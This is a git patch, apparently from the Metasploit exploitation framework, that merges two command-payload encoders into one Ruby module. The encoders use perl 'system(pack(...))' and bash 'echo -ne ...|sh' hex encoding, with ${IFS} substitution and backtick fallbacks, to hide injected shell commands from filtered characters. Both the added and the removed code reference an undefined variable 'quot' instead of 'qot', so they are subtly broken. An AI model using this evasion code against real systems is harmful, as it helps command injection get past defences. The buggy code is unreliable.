From 4a14fa7e025742983111f3213b5153a7953fcb03 Mon Sep 17 00:00:00 2001
From: HD Moore
Date: Mon, 16 Jan 2006 02:32:30 +0000
Subject: [PATCH] Merged them into one
git-svn-id: file:///home/svn/incoming/trunk@3376 4d416f70-5f16-0410-b530-b9f4589650da
---
 modules/encoders/cmd/generic_sh.rb | 85 +++++++++++++++++++++++++++
 modules/encoders/cmd/hex_bash_echo.rb | 63 --------------------
 modules/encoders/cmd/hex_perl.rb | 76 ------------------------
 3 files changed, 85 insertions(+), 139 deletions(-)
 delete mode 100644 modules/encoders/cmd/hex_bash_echo.rb
 delete mode 100644 modules/encoders/cmd/hex_perl.rb
diff --git a/modules/encoders/cmd/generic_sh.rb b/modules/encoders/cmd/generic_sh.rb
index 583b3ec59e..f7a4fb7e87 100644
--- a/modules/encoders/cmd/generic_sh.rb
+++ b/modules/encoders/cmd/generic_sh.rb 
@@ -32,6 +32,91 @@ class GenericSh < Msf::Encoder return buf end + # + # Uses the perl command to hex encode the command string + # + def encode_block_perl(state, buf) + + hex = buf.unpack("H*") + cmd = 'perl -e ' + qot = ',-:.=+!@#$%^&' + + # Find a quoting character to use + state.badchars.unpack('C*') { |c| quot.delete(c.chr) } + + # Throw an error if we ran out of quotes + raise RuntimeError if qot.length == 0 + + sep = qot[0].chr + + # Convert spaces to IFS... + if (state.badchars.include?(" ")) + cmd.gsub!(/\s/, '${IFS}') + end + + # Can we use single quotes to enclose the command string? + if (state.badchars.include?("'")) + + if (state.badchars.match(/\(|\)/)) + + # No paranthesis... + raise RuntimeError + end + + cmd << "system\\(pack\\(qq#{sep}H\\*#{sep},#{hex}\\)\\)" + + else + if (state.badchars.match(/\(|\)/)) + if (state.badchars.include?(" ")) + # No spaces allowed, no paranthesis, give up... + raise RuntimeError + end + + cmd << "'system pack qq#{sep}H*#{sep},#{hex}'" + else + cmd << "'system(pack(qq#{sep}H*#{sep},#{hex}))'" + end + end + + return cmd + end + + # + # Uses bash's echo -ne command to hex encode the command string + # + def encode_block_bash_echo(state, buf) + + hex = '' + + # Can we use single quotes to enclose the echo arguments? + if (state.badchars.include?("'")) + hex = buf.unpack('C*').collect { |c| "\\\\\\x%.2x" % c }.join + else + hex = "'" + buf.unpack('C*').collect { |c| "\\x%.2x" % c }.join + "'" + end + + # Are pipe characters restricted? + if (state.badchars.include?("|")) + + # How about backticks? + if (state.badchars.include?("`")) + raise RuntimeError + else + buf = "`echo -ne #{hex}`" + end + else + buf = "echo -ne #{hex}|sh" + end + + # Remove spaces from the command string + if (state.badchars.include?(" ")) + buf.gsub!(/\s/, '${IFS}') + end + + return buf + end + + end end end end 
diff --git a/modules/encoders/cmd/hex_bash_echo.rb b/modules/encoders/cmd/hex_bash_echo.rb deleted file mode 100644 index 6db96600e9..0000000000 --- a/modules/encoders/cmd/hex_bash_echo.rb +++ /dev/null @@ -1,63 +0,0 @@ -require 'msf/core' - -module Msf -module Encoders -module Cmd - -class HexBashEcho < Msf::Encoder - - def initialize - super( - 'Name' => 'BASH echo -e Hex Encoding', - 'Version' => '$Revision$', - 'Description' => %q{ - This encoder uses the "-e" option available in recent - versions of BASH to encode the command string. This - encoder will only work on recent Linux distributions or - situations where a new version of BASH is used to inject - the supplied command string. - }, - 'Author' => 'hdm', - 'Platform' => 'linux', - 'Arch' => ARCH_CMD) - end - - - # - # Encodes the payload - # - def encode_block(state, buf) - - hex = '' - - # Can we use single quotes to enclose the echo arguments? - if (state.badchars.include?("'")) - hex = buf.unpack('C*').collect { |c| "\\\\\\x%.2x" % c }.join - else - hex = "'" + buf.unpack('C*').collect { |c| "\\x%.2x" % c }.join + "'" - end - - # Are pipe characters restricted? - if (state.badchars.include?("|")) - - # How about backticks? - if (state.badchars.include?("`")) - raise RuntimeError - else - buf = "`echo -ne #{hex}`" - end - else - buf = "echo -ne #{hex}|sh" - end - - # Remove spaces from the command string - if (state.badchars.include?(" ")) - buf.gsub!(/\s/, '${IFS}') - end - - return buf - end - -end - -end end end diff --git a/modules/encoders/cmd/hex_perl.rb b/modules/encoders/cmd/hex_perl.rb deleted file mode 100644 index 19953ab469..0000000000 --- a/modules/encoders/cmd/hex_perl.rb +++ /dev/null 
@@ -1,76 +0,0 @@ -require 'msf/core' - -module Msf -module Encoders -module Cmd - -class HexPerl < Msf::Encoder - - def initialize - super( - 'Name' => 'PERL Hex Encoding', - 'Version' => '$Revision$', - 'Description' => %q{ - This encoder uses the PERL interpreter to decode - and execute a command supplied in hex format. This encoder - should work on most Unix systems that have PERL version - 5.0 or above. - - }, - 'Author' => 'hdm', - 'Arch' => ARCH_CMD) - end - - - # - # Encodes the payload - # - def encode_block(state, buf) - - hex = buf.unpack("H*") - cmd = 'perl -e ' - qot = ',-:.=+!@#$%^&' - - # Find a quoting character to use - state.badchars.unpack('C*') { |c| quot.delete(c.chr) } - - # Throw an error if we ran out of quotes - raise RuntimeError if qot.length == 0 - - sep = qot[0].chr - - # Convert spaces to IFS... - if (state.badchars.include?(" ")) - cmd.gsub!(/\s/, '${IFS}') - end - - # Can we use single quotes to enclose the command string? - if (state.badchars.include?("'")) - - if (state.badchars.match(/\(|\)/)) - - # No paranthesis... - raise RuntimeError - end - - cmd << "system\\(pack\\(qq#{sep}H\\*#{sep},#{hex}\\)\\)" - - else - if (state.badchars.match(/\(|\)/)) - if (state.badchars.include?(" ")) - # No spaces allowed, no paranthesis, give up... - raise RuntimeError - end - - cmd << "'system pack qq#{sep}H*#{sep},#{hex}'" - else - cmd << "'system(pack(qq#{sep}H*#{sep},#{hex}))'" - end - end - - return cmd - end - -end - -end end end